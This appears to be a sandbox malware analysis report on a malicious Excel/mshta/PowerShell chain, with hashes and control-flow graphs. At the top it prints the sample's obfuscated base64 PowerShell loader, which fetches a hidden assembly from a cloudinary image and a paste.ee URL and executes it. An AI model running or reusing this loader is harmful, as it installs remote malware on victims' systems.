'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispicule
                                                                        Imagebase:0x13fec0000
                                                                        File size:443'392 bytes
                                                                        MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Call Graph

                                                                        • Entrypoint
                                                                        • Decryption Function
                                                                        • Executed
                                                                        • Not Executed
                                                                        • Show Help
                                                                        callgraph 1 Error: Graph is empty

                                                                        Module: Sheet1

                                                                        Declaration
                                                                        LineContent
                                                                        1

                                                                        Attribute VB_Name = "Sheet1"

                                                                        2

                                                                        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                        3

                                                                        Attribute VB_GlobalNameSpace = False

                                                                        4

                                                                        Attribute VB_Creatable = False

                                                                        5

                                                                        Attribute VB_PredeclaredId = True

                                                                        6

                                                                        Attribute VB_Exposed = True

                                                                        7

                                                                        Attribute VB_TemplateDerived = False

                                                                        8

                                                                        Attribute VB_Customizable = True

                                                                        9

                                                                        Attribute VB_Name = "Sheet1"

                                                                        10

                                                                        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                        11

                                                                        Attribute VB_GlobalNameSpace = False

                                                                        12

                                                                        Attribute VB_Creatable = False

                                                                        13

                                                                        Attribute VB_PredeclaredId = True

                                                                        14

                                                                        Attribute VB_Exposed = True

                                                                        15

                                                                        Attribute VB_TemplateDerived = False

                                                                        16

                                                                        Attribute VB_Customizable = True

                                                                        Module: Sheet2

                                                                        Declaration
                                                                        LineContent
                                                                        1

                                                                        Attribute VB_Name = "Sheet2"

                                                                        2

                                                                        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                        3

                                                                        Attribute VB_GlobalNameSpace = False

                                                                        4

                                                                        Attribute VB_Creatable = False

                                                                        5

                                                                        Attribute VB_PredeclaredId = True

                                                                        6

                                                                        Attribute VB_Exposed = True

                                                                        7

                                                                        Attribute VB_TemplateDerived = False

                                                                        8

                                                                        Attribute VB_Customizable = True

                                                                        9

                                                                        Attribute VB_Name = "Sheet2"

                                                                        10

                                                                        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                        11

                                                                        Attribute VB_GlobalNameSpace = False

                                                                        12

                                                                        Attribute VB_Creatable = False

                                                                        13

                                                                        Attribute VB_PredeclaredId = True

                                                                        14

                                                                        Attribute VB_Exposed = True

                                                                        15

                                                                        Attribute VB_TemplateDerived = False

                                                                        16

                                                                        Attribute VB_Customizable = True

                                                                        Module: ThisWorkbook

                                                                        Declaration
                                                                        LineContent
                                                                        1

                                                                        Attribute VB_Name = "ThisWorkbook"

                                                                        2

                                                                        Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                                        3

                                                                        Attribute VB_GlobalNameSpace = False

                                                                        4

                                                                        Attribute VB_Creatable = False

                                                                        5

                                                                        Attribute VB_PredeclaredId = True

                                                                        6

                                                                        Attribute VB_Exposed = True

                                                                        7

                                                                        Attribute VB_TemplateDerived = False

                                                                        8

                                                                        Attribute VB_Customizable = True

                                                                        9

                                                                        Attribute VB_Name = "ThisWorkbook"

                                                                        10

                                                                        Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                                        11

                                                                        Attribute VB_GlobalNameSpace = False

                                                                        12

                                                                        Attribute VB_Creatable = False

                                                                        13

                                                                        Attribute VB_PredeclaredId = True

                                                                        14

                                                                        Attribute VB_Exposed = True

                                                                        15

                                                                        Attribute VB_TemplateDerived = False

                                                                        16

                                                                        Attribute VB_Customizable = True

                                                                        Reset < >
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000003.435214944.0000000002620000.00000010.00000800.00020000.00000000.sdmp, Offset: 02620000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_3_2620000_mshta.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                          • Instruction ID: a180a04ce5fe5c1594da341d2e89ad01ded5b4920c36c3803b211f4598a95016
                                                                          • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                          • Instruction Fuzzy Hash:
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000003.435214944.0000000002620000.00000010.00000800.00020000.00000000.sdmp, Offset: 02620000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_3_2620000_mshta.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                          • Instruction ID: a180a04ce5fe5c1594da341d2e89ad01ded5b4920c36c3803b211f4598a95016
                                                                          • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                          • Instruction Fuzzy Hash:

                                                                          Execution Graph

                                                                          Execution Coverage:4.4%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:3
                                                                          Total number of Limit Nodes:0
                                                                          execution_graph 3713 7fe899c7ae1 3714 7fe899c7af1 URLDownloadToFileW 3713->3714 3716 7fe899c7c00 3714->3716

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.465984904.000007FE899C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_7fe899c0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID: DownloadFile
                                                                          • String ID:
                                                                          • API String ID: 1407266417-0
                                                                          • Opcode ID: 9948bc6d770e860b75fa454e1b26024c9bb87e678cf14dd0d4350483a9068b22
                                                                          • Instruction ID: dd9d2aec8907b5c0eb7b7e7fbd4249ce01c59a8a7d2b2634bc6a0a032837168b
                                                                          • Opcode Fuzzy Hash: 9948bc6d770e860b75fa454e1b26024c9bb87e678cf14dd0d4350483a9068b22
                                                                          • Instruction Fuzzy Hash: 14319F31918A5C9FDB58EF5CD885BA9B7E1FB59725F00822ED04DD3661CB70B8068B81

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.466059638.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_7fe89a90000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: V
                                                                          • API String ID: 0-1342839628
                                                                          • Opcode ID: 9a4c4288cde9b9479f88f0e3859ceaca1b9b14e050f55006fffd5ef5560c42d9
                                                                          • Instruction ID: 3f2fa5811be21ebe0b82c1a9ac8e315dabf623055d310e772f17c014345f9924
                                                                          • Opcode Fuzzy Hash: 9a4c4288cde9b9479f88f0e3859ceaca1b9b14e050f55006fffd5ef5560c42d9
                                                                          • Instruction Fuzzy Hash: 1DD1F23080E7C91FD35797389C156AA7FA4EF47260F0911EBD48DCB0A3D619A95AC3A2

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.465984904.000007FE899C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_7fe899c0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID: DownloadFile
                                                                          • String ID:
                                                                          • API String ID: 1407266417-0
                                                                          • Opcode ID: 3564d2ac142c4a064d696a39380aff265b310662ce154e6a372ec1fea6ce31e1
                                                                          • Instruction ID: 641bd9236fe160d63ae29a915ee22288c1fc05c9ce19101104c63db51e3d72cf
                                                                          • Opcode Fuzzy Hash: 3564d2ac142c4a064d696a39380aff265b310662ce154e6a372ec1fea6ce31e1
                                                                          • Instruction Fuzzy Hash: 6041E67181CB889FD719DB589C447AABBF4FB56325F04426FD08DD35A2CB646806C781

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 82 7fe89a98549-7fe89a985f9 83 7fe89a98add-7fe89a98b96 82->83 84 7fe89a985ff-7fe89a98609 82->84 85 7fe89a9860b-7fe89a98618 84->85 86 7fe89a98622-7fe89a98629 84->86 85->86 87 7fe89a9861a-7fe89a98620 85->87 88 7fe89a9862b-7fe89a9863e 86->88 89 7fe89a98640 86->89 87->86 91 7fe89a98642-7fe89a98644 88->91 89->91 94 7fe89a98a58-7fe89a98a62 91->94 95 7fe89a9864a-7fe89a98656 91->95 96 7fe89a98a64-7fe89a98a74 94->96 97 7fe89a98a75-7fe89a98a85 94->97 95->83 98 7fe89a9865c-7fe89a98666 95->98 100 7fe89a98a87-7fe89a98a8b 97->100 101 7fe89a98a92-7fe89a98adc 97->101 102 7fe89a98668-7fe89a98675 98->102 103 7fe89a98682-7fe89a98692 98->103 100->101 102->103 104 7fe89a98677-7fe89a98680 102->104 103->94 108 7fe89a98698-7fe89a986cc 103->108 104->103 108->94 114 7fe89a986d2-7fe89a986de 108->114 114->83 115 7fe89a986e4-7fe89a986ee 114->115 116 7fe89a98707-7fe89a9870c 115->116 117 7fe89a986f0-7fe89a986fd 115->117 116->94 119 7fe89a98712-7fe89a98717 116->119 117->116 118 7fe89a986ff-7fe89a98705 117->118 118->116 119->94 120 7fe89a9871d-7fe89a98722 119->120 120->94 121 7fe89a98728-7fe89a98737 120->121 123 7fe89a98739-7fe89a98743 121->123 124 7fe89a98747 121->124 125 7fe89a98745 123->125 126 7fe89a98763-7fe89a987ee 123->126 127 7fe89a9874c-7fe89a98759 124->127 125->127 134 7fe89a987f0-7fe89a987fb 126->134 135 7fe89a98802-7fe89a98824 126->135 127->126 128 7fe89a9875b-7fe89a98761 127->128 128->126 134->135 136 7fe89a98826-7fe89a98830 135->136 137 7fe89a98834 135->137 138 7fe89a98850-7fe89a988de 136->138 139 7fe89a98832 136->139 140 7fe89a98839-7fe89a98846 137->140 147 7fe89a988e0-7fe89a988eb 138->147 148 7fe89a988f2-7fe89a98910 138->148 139->140 140->138 141 7fe89a98848-7fe89a9884e 140->141 141->138 147->148 149 7fe89a98920 148->149 150 7fe89a98912-7fe89a9891c 148->150 153 7fe89a98925-7fe89a98933 149->153 151 7fe89a9893d-7fe89a989cd 150->151 152 7fe89a9891e 150->152 160 7fe89a989e1-7fe89a98a3a 151->160 161 7fe89a989cf-7fe89a989da 151->161 152->153 153->151 155 7fe89a98935-7fe89a9893b 153->155 155->151 164 7fe89a98a42-7fe89a98a57 160->164 161->160
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.466059638.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_7fe89a90000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f370d066fdccf406acc49910e9caf7b70241f78ed85cb90586ffee612a43cac2
                                                                          • Instruction ID: 8ea810d4efca073b8c1119e5bfd8e95d98666b15eeba3bc0c4a6e143ee60f14e
                                                                          • Opcode Fuzzy Hash: f370d066fdccf406acc49910e9caf7b70241f78ed85cb90586ffee612a43cac2
                                                                          • Instruction Fuzzy Hash: C222F33090CB894FD79ADB2C84506697FE2FF9A344F2441EED48EC72A3DA24AC56C741

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 165 7fe89a94165-7fe89a941f4 166 7fe89a94457-7fe89a94516 165->166 167 7fe89a941fa-7fe89a94204 165->167 168 7fe89a94206-7fe89a94213 167->168 169 7fe89a9421d-7fe89a94222 167->169 168->169 170 7fe89a94215-7fe89a9421b 168->170 172 7fe89a94228-7fe89a9422b 169->172 173 7fe89a943fb-7fe89a94405 169->173 170->169 176 7fe89a9422d-7fe89a94240 172->176 177 7fe89a94242 172->177 174 7fe89a94407-7fe89a94413 173->174 175 7fe89a94414-7fe89a94424 173->175 179 7fe89a94426-7fe89a9442a 175->179 180 7fe89a94431-7fe89a94454 175->180 178 7fe89a94244-7fe89a94246 176->178 177->178 178->173 183 7fe89a9424c-7fe89a94280 178->183 179->180 180->166 190 7fe89a94297 183->190 191 7fe89a94282-7fe89a94295 183->191 192 7fe89a94299-7fe89a9429b 190->192 191->192 192->173 194 7fe89a942a1-7fe89a942a9 192->194 194->166 195 7fe89a942af-7fe89a942b9 194->195 196 7fe89a942bb-7fe89a942c8 195->196 197 7fe89a942d5-7fe89a942e5 195->197 196->197 198 7fe89a942ca-7fe89a942d3 196->198 197->173 200 7fe89a942eb-7fe89a9431c 197->200 198->197 200->173 204 7fe89a94322-7fe89a9434e 200->204 206 7fe89a94350-7fe89a94372 204->206 207 7fe89a94374 204->207 208 7fe89a94376-7fe89a94378 206->208 207->208 208->173 209 7fe89a9437e-7fe89a94386 208->209 211 7fe89a94388-7fe89a94392 209->211 212 7fe89a94396 209->212 213 7fe89a94394 211->213 214 7fe89a943b2-7fe89a943e1 211->214 216 7fe89a9439b-7fe89a943a8 212->216 213->216 220 7fe89a943e8-7fe89a943fa 214->220 216->214 217 7fe89a943aa-7fe89a943b0 216->217 217->214
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.466059638.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_7fe89a90000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d97c719ccff3148618b45c030d258fe2e6ed5f89423a190466a7baf153190bf6
                                                                          • Instruction ID: 42156de27d2845320dce19a5e0139b3cb67d8ddebcb324347abb4197b2cb979e
                                                                          • Opcode Fuzzy Hash: d97c719ccff3148618b45c030d258fe2e6ed5f89423a190466a7baf153190bf6
                                                                          • Instruction Fuzzy Hash: 18C1242091DBDA0FE74AA77C58506BA7FE1FF4A744F1901EAD48EC71A3C618AC16C361

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 221 7fe89a910d3-7fe89a910dc 222 7fe89a910ed-7fe89a91124 221->222 223 7fe89a910de-7fe89a910e7 221->223 224 7fe89a9112a-7fe89a9119e 222->224 225 7fe89a911c1-7fe89a911cb 222->225 223->222 235 7fe89a911a6-7fe89a911be 224->235 226 7fe89a911d8-7fe89a911e8 225->226 227 7fe89a911cd-7fe89a911d7 225->227 228 7fe89a911ea-7fe89a911ee 226->228 229 7fe89a911f5-7fe89a9121a 226->229 228->229 235->225
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.466059638.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_7fe89a90000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c53ac541d869e889bc624cad35ba372b3aeed02ea28f5da902297a29f69fa0fd
                                                                          • Instruction ID: fe933bf67a8512cc082a2959795a9c32e09b6c9e3ebaab8a9faf145da4c353ac
                                                                          • Opcode Fuzzy Hash: c53ac541d869e889bc624cad35ba372b3aeed02ea28f5da902297a29f69fa0fd
                                                                          • Instruction Fuzzy Hash: B941B21170DBC90FE34B937C18646657FE1EF4B259B2901EBD48ECB2A3D9099C5AC362
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.466059638.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_7fe89a90000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 233390bb6901a103968996401d820665b71de8deb5c05c2d5479885efc2ecb52
                                                                          • Instruction ID: 8ef4c6a3b7b455e7eab0c61da3ccbaa344f83be3ea90dee2d3239720d2ea3a0f
                                                                          • Opcode Fuzzy Hash: 233390bb6901a103968996401d820665b71de8deb5c05c2d5479885efc2ecb52
                                                                          • Instruction Fuzzy Hash: 3FF1142090EBC90FD747A73898146A67FE1EF87254F1902EBD48DCB1B3D6189D4AC362
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.466059638.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_7fe89a90000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fec0a4ff574bece6345ba84354c3d034a16eb61d9c989d4f1fad082a51943c0c
                                                                          • Instruction ID: 436b1b6ed426aef82f9545980cbaa83658cd26edc791b45de2bbeefff19a4221
                                                                          • Opcode Fuzzy Hash: fec0a4ff574bece6345ba84354c3d034a16eb61d9c989d4f1fad082a51943c0c
                                                                          • Instruction Fuzzy Hash: 53A1342190EBC90FD747A77898242A63FF1EF4B254F1901EBD48DCB1A3D6199D1AC362
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.465984904.000007FE899C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_7fe899c0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f23851bb99f5e35b3946782e50d81bc471cdebfb5ea0cd36157619ceb9675fb3
                                                                          • Instruction ID: f4f921b0cf4356605c12bdc8925fa72dec7965645aef71fba58c8d674cfb8e98
                                                                          • Opcode Fuzzy Hash: f23851bb99f5e35b3946782e50d81bc471cdebfb5ea0cd36157619ceb9675fb3
                                                                          • Instruction Fuzzy Hash: 1F31647FB193A15EE210B62DFCC29EE7758EF8163A70401B7E2C889073D528554E42B4
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000003.481095842.00000000033F0000.00000010.00000800.00020000.00000000.sdmp, Offset: 033F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_3_33f0000_mshta.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                          • Instruction ID: 814c6190d0fa3842587fe336a5ac3a78a0aa336190e9f8aced39918f956feb2b
                                                                          • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                          • Instruction Fuzzy Hash:
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000003.481095842.00000000033F0000.00000010.00000800.00020000.00000000.sdmp, Offset: 033F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_3_33f0000_mshta.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                          • Instruction ID: 814c6190d0fa3842587fe336a5ac3a78a0aa336190e9f8aced39918f956feb2b
                                                                          • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                          • Instruction Fuzzy Hash: